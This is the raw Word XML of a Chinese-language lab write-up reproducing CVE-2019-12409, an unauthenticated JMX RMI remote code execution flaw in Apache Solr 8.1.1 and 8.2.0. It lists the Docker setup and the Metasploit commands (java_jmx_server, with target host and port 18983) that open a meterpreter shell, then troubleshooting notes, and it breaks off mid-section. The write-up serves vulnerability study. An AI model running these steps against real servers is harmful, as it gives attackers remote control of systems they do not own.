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2D" w:rsidRDefault="004F174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Apache Solr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>远程代码执行漏洞复现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CVE-2019-12409</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174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Solr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是一个独立的企业级搜索应用服务器，它对外提供类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web-service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接口。是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的顶级开源项目，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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开发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，基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lucene</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的全文检索服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174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该漏洞是在受影响的版本中，默认情况下配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>solr.in.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的配置选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENABLE_REMOTE_JMX_OPTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字段值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“true”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，这会启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JMX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>监视服务并会在公网中监听一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18983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RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>端口，没有任何认证。也就是说在无需身份验证情况下，攻击者结合使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JMX RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就会造成远程代码攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3311" w:rsidRDefault="00FD3311" w:rsidP="00FD3311">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pP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前置条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>Solr 8.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>Solr 8.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00626253">
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击机环境及工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>2020</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试机环境及工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kali2020 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r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拉取环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker pull solr:8.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
      </w:pPr>
      <w:r>
        <w:t>docker run --name my-solr1 -d -p 8983:8983 -p 18983:18983 -t solr:8.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00626253">
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00FD3311">
        <w:t>OC1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来源：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:r w:rsidR="00A90A99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="00A90A99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">wql@kali:~$ msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">msf5 &gt; search jmx      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4432300" cy="3130550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1" name="图片 1" descr="msf5配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sf5配置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D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">msf5 &gt; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit/multi/misc/java_jmx_server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf5 exploit(multi/misc/java_jmx_server) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4521200" cy="3638550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2" name="图片 2" descr="msf5配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sf5配置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D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:t>msf5 exploit(multi/misc/java_jmx_server) &gt; set rhosts 172.17.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：设置目标地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:t>msf5 exploit(multi/misc/java_jmx_server) &gt; set rport 18983</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:t>msf5 exploit(multi/misc/java_jmx_server) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4476750" cy="2863850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="3" name="图片 3" descr="msf5配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sf5配置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D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">meterpreter &gt; pwd                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：成功会弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4241800" cy="3511550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4" name="图片 4" descr="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成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D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C" w:rsidP="00FD3311">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败原因</w:t>
      </w:r>
      <w:r w:rsidR="00FD3311">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>solr.in.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ENABLE_REMOTE_JMX_OPTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段值是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”但是目标地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18983</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口却未打开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3581400" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0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D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D"/>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用容器时指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个端口：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C" w:rsidP="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>docker run --name my-solr1 -d -p 8983:8983 -p 18983:18983 -t solr:8.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F174C" w:rsidRDefault="004F174C" w:rsidP="004F174C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C" w:rsidP="00FD3311">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败原因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10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kali2020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动失败。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决办法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
